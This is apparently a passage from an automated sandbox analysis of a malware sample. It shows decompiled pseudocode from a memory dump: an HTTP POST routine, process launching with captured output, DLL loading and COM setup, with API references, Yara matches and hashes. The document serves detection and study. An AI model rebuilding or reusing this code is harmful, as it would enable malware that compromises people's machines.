                                    								_t216 =  *((intOrPtr*)(_t136 + 0x20))(_t186, "POST",  &_v652, 0, 0,  &_v64, _t133, 0);
                                    								_v8 = _t216;
                                    								if(_a24 != 0) {
                                    									E0008980C(_a24);
                                    								}
                                    								if(_t216 != 0) {
                                    									_t138 = 4;
                                    									if(_v112 != _t138) {
                                    										L19:
                                    										_t139 = E000895C7(0x777);
                                    										_t217 = _t139;
                                    										_v12 = _t217;
                                    										_t141 =  *0x9e6a4; // 0x1400810
                                    										_t218 = _v8;
                                    										_v28 =  *((intOrPtr*)(_t141 + 0x24))(_t218, _t217, E0008C379(_t217), _a4, _a8);
                                    										E000885C2( &_v12);
                                    										if(_a24 != 0) {
                                    											E0008980C(_a24);
                                    										}
                                    										if(_v28 != 0) {
                                    											L28:
                                    											_v24 = 8;
                                    											_push(0);
                                    											_v32 = 0;
                                    											_v28 = 0;
                                    											_push( &_v24);
                                    											_push( &_v32);
                                    											_t147 =  *0x9e6a4; // 0x1400810
                                    											_push(0x13);
                                    											_push(_t218);
                                    											if( *((intOrPtr*)(_t147 + 0xc))() != 0) {
                                    												_t219 = E00089749( &_v32);
                                    												if(_t219 == 0xc8) {
                                    													 *_a20 = _v8;
                                    													 *_a12 = _t213;
                                    													 *_a16 = _t186;
                                    													return 0;
                                    												}
                                    												_t220 =  ~_t219;
                                    												L32:
                                    												_t154 =  *0x9e6a4; // 0x1400810
                                    												 *((intOrPtr*)(_t154 + 8))(_v8);
                                    												L33:
                                    												if(_t186 != 0) {
                                    													_t158 =  *0x9e6a4; // 0x1400810
                                    													 *((intOrPtr*)(_t158 + 8))(_t186);
                                    												}
                                    												if(_t213 != 0) {
                                    													_t203 =  *0x9e6a4; // 0x1400810
                                    													 *((intOrPtr*)(_t203 + 8))(_t213);
                                    												}
                                    												return _t220;
                                    											}
                                    											GetLastError();
                                    											_t220 = 0xfffffff8;
                                    											goto L32;
                                    										} else {
                                    											GetLastError();
                                    											_t162 =  *0x9e6a4; // 0x1400810
                                    											 *((intOrPtr*)(_t162 + 8))(_t218);
                                    											_t218 = 0;
                                    											goto L23;
                                    										}
                                    									}
                                    									_v12 = _t138;
                                    									_push( &_v12);
                                    									_push( &_v16);
                                    									_t172 =  *0x9e6a4; // 0x1400810
                                    									_push(0x1f);
                                    									_push(_t216);
                                    									if( *((intOrPtr*)(_t172 + 0x18))() == 0) {
                                    										L18:
                                    										GetLastError();
                                    										goto L19;
                                    									}
                                    									_v16 = _v16 | 0x00003380;
                                    									_push(4);
                                    									_push( &_v16);
                                    									_t176 =  *0x9e6a4; // 0x1400810
                                    									_push(0x1f);
                                    									_push(_t216);
                                    									if( *((intOrPtr*)(_t176 + 0x14))() != 0) {
                                    										goto L19;
                                    									}
                                    									goto L18;
                                    								} else {
                                    									GetLastError();
                                    									L23:
                                    									_t164 =  *0x9e6a4; // 0x1400810
                                    									 *((intOrPtr*)(_t164 + 8))(_t186);
                                    									_t186 = 0;
                                    									goto L24;
                                    								}
                                    							} else {
                                    								GetLastError();
                                    								L24:
                                    								_t166 =  *0x9e6a4; // 0x1400810
                                    								 *((intOrPtr*)(_t166 + 8))(_t213);
                                    								_t213 = 0;
                                    								goto L25;
                                    							}
                                    						}
                                    						GetLastError();
                                    						L25:
                                    						_t204 = _t218;
                                    						_t209 = _v20 + 1;
                                    						_v20 = _t209;
                                    					} while (_t209 < 2);
                                    					_v8 = _t218;
                                    					if(_t204 != 0) {
                                    						goto L28;
                                    					}
                                    					_t220 = 0xfffffffe;
                                    					goto L33;
                                    				}
                                    				_t183 = 0xfffffffc;
                                    				return _t183;
                                    			}



































































                                    0x0008e8a5
                                    0x0008e8aa
                                    0x0008e8ac
                                    0x0008e8b2
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0008e86b
                                    0x0008e86b
                                    0x0008e914
                                    0x0008e914
                                    0x0008e91a
                                    0x0008e91d
                                    0x00000000
                                    0x0008e91d
                                    0x0008e81c
                                    0x0008e81c
                                    0x0008e91f
                                    0x0008e91f
                                    0x0008e925
                                    0x0008e928
                                    0x00000000
                                    0x0008e928
                                    0x0008e81a
                                    0x0008e785
                                    0x0008e92a
                                    0x0008e92d
                                    0x0008e92f
                                    0x0008e932
                                    0x0008e935
                                    0x0008e93e
                                    0x0008e943
                                    0x00000000
                                    0x00000000
                                    0x0008e947
                                    0x00000000
                                    0x0008e947
                                    0x0008e754
                                    0x00000000

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: memset$ErrorLast
                                    • String ID: POST
                                    • API String ID: 2570506013-1814004025
                                    • Opcode ID: 367a7a72f7db2160077767910a4473ccd00a1e93e961edb2d3cd1ed941d500fc
                                    • Instruction ID: ea6434b96816f391ca67125378d8c048189af0a816e14d9e93347baa296bf716
                                    • Opcode Fuzzy Hash: 367a7a72f7db2160077767910a4473ccd00a1e93e961edb2d3cd1ed941d500fc
                                    • Instruction Fuzzy Hash: 50B13C71900208AFEB55EFA4DC89EAE7BB8FF58310F10406AF545EB291DB749E44CB61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 28%
                                    			E000916B8(signed int* _a4) {
                                    				char _v8;
                                    				_Unknown_base(*)()* _v12;
                                    				_Unknown_base(*)()* _v16;
                                    				char _v20;
                                    				_Unknown_base(*)()* _t16;
                                    				_Unknown_base(*)()* _t17;
                                    				void* _t22;
                                    				intOrPtr* _t28;
                                    				signed int _t29;
                                    				signed int _t30;
                                    				struct HINSTANCE__* _t32;
                                    				void* _t34;
                                    
                                    				_t30 = 0;
                                    				_v8 = 0;
                                    				_t32 = GetModuleHandleA("advapi32.dll");
                                    				if(_t32 == 0) {
                                    					L9:
                                    					return 1;
                                    				}
                                    				_t16 = GetProcAddress(_t32, "CryptAcquireContextA");
                                    				_v12 = _t16;
                                    				if(_t16 == 0) {
                                    					goto L9;
                                    				}
                                    				_t17 = GetProcAddress(_t32, "CryptGenRandom");
                                    				_v16 = _t17;
                                    				if(_t17 == 0) {
                                    					goto L9;
                                    				}
                                    				_t28 = GetProcAddress(_t32, "CryptReleaseContext");
                                    				if(_t28 == 0) {
                                    					goto L9;
                                    				}
                                    				_push(0xf0000000);
                                    				_push(1);
                                    				_push(0);
                                    				_push(0);
                                    				_push( &_v8);
                                    				if(_v12() == 0) {
                                    					goto L9;
                                    				}
                                    				_t22 = _v16(_v8, 4,  &_v20);
                                    				 *_t28(_v8, 0);
                                    				if(_t22 == 0) {
                                    					goto L9;
                                    				}
                                    				_t29 = 0;
                                    				do {
                                    					_t30 = _t30 << 0x00000008 |  *(_t34 + _t29 - 0x10) & 0x000000ff;
                                    					_t29 = _t29 + 1;
                                    				} while (_t29 < 4);
                                    				 *_a4 = _t30;
                                    				return 0;
                                    			}
















                                    APIs
                                    • GetModuleHandleA.KERNEL32(advapi32.dll,00000000,00000000,00000000,0008765A,?,?,00000000,?), ref: 000916CB
                                    • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?,?,00000000,?), ref: 000916E3
                                    • GetProcAddress.KERNEL32(00000000,CryptGenRandom,?,?,00000000,?), ref: 000916F2
                                    • GetProcAddress.KERNEL32(00000000,CryptReleaseContext,?,?,00000000,?), ref: 00091701
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$HandleModule
                                    • String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
                                    • API String ID: 667068680-129414566
                                    • Opcode ID: 27f9b75c89bbff0010089760dc2ea391a5fe869bbdee21b5a79a33e181e9a0cc
                                    • Instruction ID: f7ee788a374f61118607f953ef7ffa495e5dc05b0280f9c56cf14542586de261
                                    • Opcode Fuzzy Hash: 27f9b75c89bbff0010089760dc2ea391a5fe869bbdee21b5a79a33e181e9a0cc
                                    • Instruction Fuzzy Hash: B5117731B046177BDF515BEA8C84EEFBBF9AF46780B044065FA15F6240DA70D901A764
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 87%
                                    			E00092122(char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
                                    				signed int _t12;
                                    				signed int _t13;
                                    				int _t15;
                                    				char* _t24;
                                    				char* _t26;
                                    				char* _t28;
                                    				char* _t29;
                                    				signed int _t40;
                                    				char* _t43;
                                    				char* _t45;
                                    				long long* _t47;
                                    
                                    				_t12 = _a20;
                                    				if(_t12 == 0) {
                                    					_t12 = 0x11;
                                    				}
                                    				_t26 = _a4;
                                    				_push(_t30);
                                    				 *_t47 = _a12;
                                    				_push(_t12);
                                    				_push("%.*g");
                                    				_push(_a8);
                                    				_push(_t26);
                                    				L00092285();
                                    				_t40 = _t12;
                                    				if(_t40 < 0 || _t40 >= _a8) {
                                    					L19:
                                    					_t13 = _t12 | 0xffffffff;
                                    					goto L20;
                                    				} else {
                                    					L000922CD();
                                    					_t15 =  *((intOrPtr*)( *_t12));
                                    					if(_t15 != 0x2e) {
                                    						_t24 = strchr(_t26, _t15);
                                    						if(_t24 != 0) {
                                    							 *_t24 = 0x2e;
                                    						}
                                    					}
                                    					if(strchr(_t26, 0x2e) != 0 || strchr(_t26, 0x65) != 0) {
                                    						L11:
                                    						_t43 = strchr(_t26, 0x65);
                                    						_t28 = _t43;
                                    						if(_t43 == 0) {
                                    							L18:
                                    							_t13 = _t40;
                                    							L20:
                                    							return _t13;
                                    						}
                                    						_t45 = _t43 + 1;
                                    						_t29 = _t28 + 2;
                                    						if( *_t45 == 0x2d) {
                                    							_t45 = _t29;
                                    						}
                                    						while( *_t29 == 0x30) {
                                    							_t29 = _t29 + 1;
                                    						}
                                    						if(_t29 != _t45) {
                                    							E00088706(_t45, _t29, _t40 - _t29 + _a4);
                                    							_t40 = _t40 + _t45 - _t29;
                                    						}
                                    						goto L18;
                                    					} else {
                                    						_t6 = _t40 + 3; // 0x909b2
                                    						_t12 = _t6;
                                    						if(_t12 >= _a8) {
                                    							goto L19;
                                    						}
                                    						_t26[_t40] = 0x302e;
                                    						( &(_t26[2]))[_t40] = 0;
                                    						_t40 = _t40 + 2;
                                    						goto L11;
                                    					}
                                    				}
                                    			}















                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: strchr$_snprintflocaleconv
                                    • String ID: %.*g
                                    • API String ID: 1910550357-952554281
                                    • Opcode ID: ce2afa961fa85e74440034e363737a64cfa4b0764273ec5c58c06da3881b6a43
                                    • Instruction ID: 1807b53470dfa9210b137be6f10a1510799a81b613ee7934cd0fe15d2e85ebbb
                                    • Opcode Fuzzy Hash: ce2afa961fa85e74440034e363737a64cfa4b0764273ec5c58c06da3881b6a43
                                    • Instruction Fuzzy Hash: 8E216A766047427ADF259A28DCC6BEA3BDCDF25330F150155FE509A182EA74EC60B3A0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: _snprintfqsort
                                    • String ID: %I64d$false$null$true
                                    • API String ID: 756996078-4285102228
                                    • Opcode ID: c3656f1e48f6528892983799641ac3336606c700c83bb0b62e38ba968db40f99
                                    • Instruction ID: e8f87335b98eb15e4b72e6aadc3c6444a94586e470a32963d335527edd021b66
                                    • Opcode Fuzzy Hash: c3656f1e48f6528892983799641ac3336606c700c83bb0b62e38ba968db40f99
                                    • Instruction Fuzzy Hash: F1E17DB190020ABFDF119F64CC46EEF3BA9EF55384F108019FE1596152EB31DA61EBA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • SysAllocString.OLEAUT32(00000000), ref: 0008D75C
                                    • SysAllocString.OLEAUT32(?), ref: 0008D764
                                    • SysAllocString.OLEAUT32(00000000), ref: 0008D778
                                    • SysFreeString.OLEAUT32(?), ref: 0008D7F3
                                    • SysFreeString.OLEAUT32(?), ref: 0008D7F6
                                    • SysFreeString.OLEAUT32(?), ref: 0008D7FB
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: String$AllocFree
                                    • String ID:
                                    • API String ID: 344208780-0
                                    • Opcode ID: 0ae35b3864b79a2002ceb2acc07a6214e28e9f75c0e65d5a7fc5e6ecf6b65d72
                                    • Instruction ID: a89b29efd16a02d44f6d8e25ac1661f5a2b1d21aaf5940480051179919990030
                                    • Opcode Fuzzy Hash: 0ae35b3864b79a2002ceb2acc07a6214e28e9f75c0e65d5a7fc5e6ecf6b65d72
                                    • Instruction Fuzzy Hash: 1821F975900218AFDB10EFA5CC88DAFBBBDFF48654B10449AF505E7250DA71AE01CB60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: @$\u%04X$\u%04X\u%04X
                                    • API String ID: 0-2132903582
                                    • Opcode ID: ad3677773898463b826370865ef61fb4a1262acb6dcbc071cab37c5794fd638b
                                    • Instruction ID: fcde36fe93850f7dd9ad1ae31ae76e92f94782fe824cdb2d7e9ac6baa3171ba9
                                    • Opcode Fuzzy Hash: ad3677773898463b826370865ef61fb4a1262acb6dcbc071cab37c5794fd638b
                                    • Instruction Fuzzy Hash: C6411931700205EFEF784A9CCD9ABBF2AA8DF45340F244125F986D6396DA61CD91B3D1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 30%
                                    			E0008D523(void* __ecx) {
                                    				char _v8;
                                    				void* _v12;
                                    				char* _t15;
                                    				intOrPtr* _t16;
                                    				void* _t21;
                                    				intOrPtr* _t23;
                                    				intOrPtr* _t24;
                                    				intOrPtr* _t25;
                                    				void* _t30;
                                    				void* _t33;
                                    
                                    				_v12 = 0;
                                    				_v8 = 0;
                                    				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
                                    				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
                                    				_t15 =  &_v12;
                                    				__imp__CoCreateInstance(0x9b848, 0, 1, 0x9b858, _t15);
                                    				if(_t15 < 0) {
                                    					L5:
                                    					_t23 = _v8;
                                    					if(_t23 != 0) {
                                    						 *((intOrPtr*)( *_t23 + 8))(_t23);
                                    					}
                                    					_t24 = _v12;
                                    					if(_t24 != 0) {
                                    						 *((intOrPtr*)( *_t24 + 8))(_t24);
                                    					}
                                    					_t16 = 0;
                                    				} else {
                                    					__imp__#2(__ecx);
                                    					_t25 = _v12;
                                    					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
                                    					if(_t21 < 0) {
                                    						goto L5;
                                    					} else {
                                    						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
                                    						if(_t21 < 0) {
                                    							goto L5;
                                    						} else {
                                    							_t16 = E00088604(8);
                                    							if(_t16 == 0) {
                                    								goto L5;
                                    							} else {
                                    								 *((intOrPtr*)(_t16 + 4)) = _v12;
                                    								 *_t16 = _v8;
                                    							}
                                    						}
                                    					}
                                    				}
                                    				return _t16;
                                    			}














                                    APIs
                                    • CoInitializeEx.OLE32(00000000,00000000), ref: 0008D536
                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0008D547
                                    • CoCreateInstance.OLE32(0009B848,00000000,00000001,0009B858,?), ref: 0008D55E
                                    • SysAllocString.OLEAUT32(00000000), ref: 0008D569
                                    • CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0008D594
                                      • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: Initialize$AllocAllocateBlanketCreateHeapInstanceProxySecurityString
                                    • String ID:
                                    • API String ID: 1610782348-0
                                    • Opcode ID: 61e718e46d9626c6fc607ac76e9c554d5449760960f597cd4dce1a0c96a4aa07
                                    • Instruction ID: 5ca9e363416111ca0ccf9453dcb24a0453d396344b9ddfdbf921160754929c58
                                    • Opcode Fuzzy Hash: 61e718e46d9626c6fc607ac76e9c554d5449760960f597cd4dce1a0c96a4aa07
                                    • Instruction Fuzzy Hash: 6F21E970600245BBEB249B66DC4DE6FBFBCFFC6B25F10415EB541A62A0DA709A01CB30
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 79%
                                    			E000921FF(char* __eax, char** _a4, long long* _a8) {
                                    				char* _v8;
                                    				long long _v16;
                                    				char* _t9;
                                    				signed char _t11;
                                    				char** _t19;
                                    				char _t22;
                                    				long long _t32;
                                    				long long _t33;
                                    
                                    				_t9 = __eax;
                                    				L000922CD();
                                    				_t19 = _a4;
                                    				_t22 =  *__eax;
                                    				if( *_t22 != 0x2e) {
                                    					_t9 = strchr( *_t19, 0x2e);
                                    					if(_t9 != 0) {
                                    						 *_t9 =  *_t22;
                                    					}
                                    				}
                                    				L00092291();
                                    				 *_t9 =  *_t9 & 0x00000000;
                                    				_t11 = strtod( *_t19,  &_v8);
                                    				asm("fst qword [ebp-0xc]");
                                    				_t32 =  *0x98250;
                                    				asm("fucomp st1");
                                    				asm("fnstsw ax");
                                    				if((_t11 & 0x00000044) != 0) {
                                    					L5:
                                    					st0 = _t32;
                                    					L00092291();
                                    					if( *_t11 != 0x22) {
                                    						_t33 = _v16;
                                    						goto L8;
                                    					} else {
                                    						return _t11 | 0xffffffff;
                                    					}
                                    				} else {
                                    					_t33 =  *0x98258;
                                    					asm("fucomp st1");
                                    					asm("fnstsw ax");
                                    					if((_t11 & 0x00000044) != 0) {
                                    						L8:
                                    						 *_a8 = _t33;
                                    						return 0;
                                    					} else {
                                    						goto L5;
                                    					}
                                    				}
                                    			}












                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: _errno$localeconvstrchrstrtod
                                    • String ID:
                                    • API String ID: 1035490122-0
                                    • Opcode ID: de4c433de47fb25370494944294a547a5aa963e4291e7017832a2afbf295a471
                                    • Instruction ID: 9be57ecffa989f7d2828815fae2d17a9d7f4e019258d81125002a8d3572c8328
                                    • Opcode Fuzzy Hash: de4c433de47fb25370494944294a547a5aa963e4291e7017832a2afbf295a471
                                    • Instruction Fuzzy Hash: 7701F239904205FADF127F24E9057DD7BA8AF4B360F2041D1E9D0A61E2DB759854E7A0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 73%
                                    			E0008A9B7(signed int __ecx) {
                                    				void* _v8;
                                    				void* _v12;
                                    				void* _v16;
                                    				void* _v20;
                                    				signed int _v24;
                                    				char _v28;
                                    				char _v32;
                                    				char _v36;
                                    				struct _SECURITY_ATTRIBUTES _v48;
                                    				intOrPtr _v60;
                                    				char _v64;
                                    				intOrPtr _v76;
                                    				intOrPtr _v80;
                                    				void* _v84;
                                    				short _v92;
                                    				intOrPtr _v96;
                                    				void _v140;
                                    				intOrPtr _t77;
                                    				void* _t79;
                                    				intOrPtr _t85;
                                    				intOrPtr _t87;
                                    				intOrPtr _t89;
                                    				intOrPtr _t92;
                                    				intOrPtr _t98;
                                    				intOrPtr _t100;
                                    				intOrPtr _t102;
                                    				long _t111;
                                    				intOrPtr _t115;
                                    				intOrPtr _t126;
                                    				void* _t127;
                                    				void* _t128;
                                    				void* _t129;
                                    				void* _t130;
                                    
                                    				_t111 = 0;
                                    				_v24 = __ecx;
                                    				_v12 = 0;
                                    				_v20 = 0;
                                    				_t127 = 0;
                                    				_v8 = 0;
                                    				_v16 = 0;
                                    				_v48.nLength = 0xc;
                                    				_v48.lpSecurityDescriptor = 0;
                                    				_v48.bInheritHandle = 1;
                                    				_v28 = 0;
                                    				memset( &_v140, 0, 0x44);
                                    				asm("stosd");
                                    				_t130 = _t129 + 0xc;
                                    				asm("stosd");
                                    				asm("stosd");
                                    				asm("stosd");
                                    				if(CreatePipe( &_v12,  &_v20,  &_v48, 0) == 0) {
                                    					L18:
                                    					return 0;
                                    				}
                                    				if(CreatePipe( &_v8,  &_v16,  &_v48, 0) == 0) {
                                    					L13:
                                    					E0008861A( &_v28, 0);
                                    					if(_v20 != 0) {
                                    						_t77 =  *0x9e684; // 0x12af8f0
                                    						 *((intOrPtr*)(_t77 + 0x30))(_v20);
                                    					}
                                    					if(_v8 != 0) {
                                    						_t115 =  *0x9e684; // 0x12af8f0
                                    						 *((intOrPtr*)(_t115 + 0x30))(_v8);
                                    					}
                                    					return _t111;
                                    				}
                                    				_t79 = _v16;
                                    				_v76 = _t79;
                                    				_v80 = _t79;
                                    				_v84 = _v12;
                                    				_v140 = 0x44;
                                    				_v96 = 0x101;
                                    				_v92 = 0;
                                    				_t126 = E00088604(0x1001);
                                    				_v28 = _t126;
                                    				if(_t126 == 0) {
                                    					goto L18;
                                    				}
                                    				_push( &_v64);
                                    				_push( &_v140);
                                    				_t85 =  *0x9e684; // 0x12af8f0
                                    				_push(0);
                                    				_push(0);
                                    				_push(0x8000000);
                                    				_push(1);
                                    				_push(0);
                                    				_push(0);
                                    				_push(_v24);
                                    				_push(0);
                                    				if( *((intOrPtr*)(_t85 + 0x38))() == 0) {
                                    					goto L13;
                                    				}
                                    				_t87 =  *0x9e684; // 0x12af8f0
                                    				 *((intOrPtr*)(_t87 + 0x30))(_v12);
                                    				_t89 =  *0x9e684; // 0x12af8f0
                                    				 *((intOrPtr*)(_t89 + 0x30))(_v16);
                                    				_v24 = _v24 & 0;
                                    				do {
                                    					_t92 =  *0x9e684; // 0x12af8f0
                                    					_v36 =  *((intOrPtr*)(_t92 + 0x88))(_v8, _t126, 0x1000,  &_v24, 0);
                                    					 *((char*)(_v24 + _t126)) = 0;
                                    					if(_t111 == 0) {
                                    						_t127 = E000891A6(_t126, 0);
                                    					} else {
                                    						_push(0);
                                    						_push(_t126);
                                    						_v32 = _t127;
                                    						_t127 = E00089292(_t127);
                                    						E0008861A( &_v32, 0xffffffff);
                                    						_t130 = _t130 + 0x14;
                                    					}
                                    					_t111 = _t127;
                                    					_v32 = _t127;
                                    				} while (_v36 != 0);
                                    				_push( &_v36);
                                    				_push(E0008C379(_t127));
                                    				_t98 =  *0x9e68c; // 0x12afab8
                                    				_push(_t127);
                                    				if( *((intOrPtr*)(_t98 + 0xb8))() != 0) {
                                    					L12:
                                    					_t100 =  *0x9e684; // 0x12af8f0
                                    					 *((intOrPtr*)(_t100 + 0x30))(_v64);
                                    					_t102 =  *0x9e684; // 0x12af8f0
                                    					 *((intOrPtr*)(_t102 + 0x30))(_v60);
                                    					goto L13;
                                    				}
                                    				_t128 = E00089256(_t127);
                                    				if(_t128 == 0) {
                                    					goto L12;
                                    				}
                                    				E0008861A( &_v32, 0);
                                    				return _t128;
                                    			}





































                                    APIs
                                    • memset.MSVCRT ref: 0008A9F4
                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000,00000000,00000000,00000000), ref: 0008AA18
                                    • CreatePipe.KERNEL32(000865A9,?,0000000C,00000000), ref: 0008AA2F
                                      • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                                      • Part of subcall function 0008861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088660
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: CreateHeapPipe$AllocateFreememset
                                    • String ID: D
                                    • API String ID: 2365139273-2746444292
                                    • Opcode ID: 67bc10a6decf753f6dac1e13afc2d66274f75466a29843fca943c411748d35ce
                                    • Instruction ID: 1038731307509bc63423b83b895d9a6edc7a8df2068bd220f00375d18a9fab8d
                                    • Opcode Fuzzy Hash: 67bc10a6decf753f6dac1e13afc2d66274f75466a29843fca943c411748d35ce
                                    • Instruction Fuzzy Hash: 3A512C72E00209AFEB51EFA4CC45FDEBBB9BB08300F14416AF544E7152EB7499048B61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 89%
                                    			E0008C4CE(void* __ebx, void* __edx, void* __edi, void* __esi) {
                                    				char _v8;
                                    				char _v12;
                                    				void _v140;
                                    				signed char _t14;
                                    				char _t15;
                                    				intOrPtr _t20;
                                    				void* _t25;
                                    				intOrPtr _t26;
                                    				intOrPtr _t32;
                                    				WCHAR* _t34;
                                    				intOrPtr _t35;
                                    				struct HINSTANCE__* _t37;
                                    				int _t38;
                                    				intOrPtr _t46;
                                    				void* _t47;
                                    				intOrPtr _t50;
                                    				void* _t60;
                                    				void* _t61;
                                    				char _t62;
                                    				char* _t63;
                                    				void* _t65;
                                    				intOrPtr _t66;
                                    				char _t68;
                                    
                                    				_t65 = __esi;
                                    				_t61 = __edi;
                                    				_t47 = __ebx;
                                    				_t50 =  *0x9e688; // 0xf0000
                                    				_t14 =  *(_t50 + 0x1898);
                                    				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
                                    					_t15 = E000895E1(_t50, 0xb62);
                                    					_t66 =  *0x9e688; // 0xf0000
                                    					_t62 = _t15;
                                    					_t67 = _t66 + 0xb0;
                                    					_v8 = _t62;
                                    					E00089640( &_v140, 0x40, L"%08x", E0008D400(_t66 + 0xb0, E0008C379(_t66 + 0xb0), 0));
                                    					_t20 =  *0x9e688; // 0xf0000
                                    					asm("sbb eax, eax");
                                    					_t25 = E000895E1(_t67, ( ~( *(_t20 + 0xa8)) & 0x00000068) + 0x615);
                                    					_t63 = "\\";
                                    					_t26 =  *0x9e688; // 0xf0000
                                    					_t68 = E000892E5(_t26 + 0x1020);
                                    					_v12 = _t68;
                                    					E000885D5( &_v8);
                                    					_t32 =  *0x9e688; // 0xf0000
                                    					_t34 = E000892E5(_t32 + 0x122a);
                                    					 *0x9e784 = _t34;
                                    					_t35 =  *0x9e684; // 0x12af8f0
                                    					 *((intOrPtr*)(_t35 + 0x110))(_t68, _t34, 0, _t63,  &_v140, ".", L"dll", 0, _t63, _t25, _t63, _t62, 0, _t61, _t65, _t47);
                                    					_t37 = LoadLibraryW( *0x9e784);
                                    					 *0x9e77c = _t37;
                                    					if(_t37 == 0) {
                                    						_t38 = 0;
                                    					} else {
                                    						_push(_t37);
                                    						_t60 = 0x28;
                                    						_t38 = E0008E171(0x9bb48, _t60);
                                    					}
                                    					 *0x9e780 = _t38;
                                    					E0008861A( &_v12, 0xfffffffe);
                                    					memset( &_v140, 0, 0x80);
                                    					if( *0x9e780 != 0) {
                                    						goto L10;
                                    					} else {
                                    						E0008861A(0x9e784, 0xfffffffe);
                                    						goto L8;
                                    					}
                                    				} else {
                                    					L8:
                                    					if( *0x9e780 == 0) {
                                    						_t46 =  *0x9e6bc; // 0x12afa18
                                    						 *0x9e780 = _t46;
                                    					}
                                    					L10:
                                    					return 1;
                                    				}
                                    			}



























                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: LibraryLoadmemset
                                    • String ID: %08x$dll
                                    • API String ID: 3406617148-2963171978
                                    • Opcode ID: d0cc9968a293dd3dfd5a1183e1ba6c410fd70592b1cb07f3e9d2906c3aa602dc
                                    • Instruction ID: f3dd22374d708548471efb5ddff1d4c344fbc2453a9af2a3a2ac9a4f9c61bf9a
                                    • Opcode Fuzzy Hash: d0cc9968a293dd3dfd5a1183e1ba6c410fd70592b1cb07f3e9d2906c3aa602dc
                                    • Instruction Fuzzy Hash: BB31B3B2A00244BBFB10FBA8EC89FAA73ACFB54354F544036F145D7192EB789D418725
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 99%
                                    			E00092D70(int _a4, signed int _a8) {
                                    				int _v8;
                                    				intOrPtr _v12;
                                    				signed int _v16;
                                    				void* __esi;
                                    				void* _t137;
                                    				signed int _t141;
                                    				intOrPtr* _t142;
                                    				signed int _t145;
                                    				signed int _t146;
                                    				intOrPtr _t151;
                                    				intOrPtr _t161;
                                    				intOrPtr _t162;
                                    				intOrPtr _t167;
                                    				intOrPtr _t170;
                                    				signed int _t172;
                                    				intOrPtr _t173;
                                    				int _t184;
                                    				intOrPtr _t185;
                                    				intOrPtr _t188;
                                    				signed int _t189;
                                    				void* _t195;
                                    				int _t202;
                                    				int _t208;
                                    				intOrPtr _t217;
                                    				signed int _t218;
                                    				int _t219;
                                    				intOrPtr _t220;
                                    				signed int _t221;
                                    				signed int _t222;
                                    				int _t224;
                                    				int _t225;
                                    				signed int _t227;
                                    				intOrPtr _t228;
                                    				int _t232;
                                    				int _t234;
                                    				signed int _t235;
                                    				int _t239;
                                    				void* _t240;
                                    				int _t245;
                                    				int _t252;
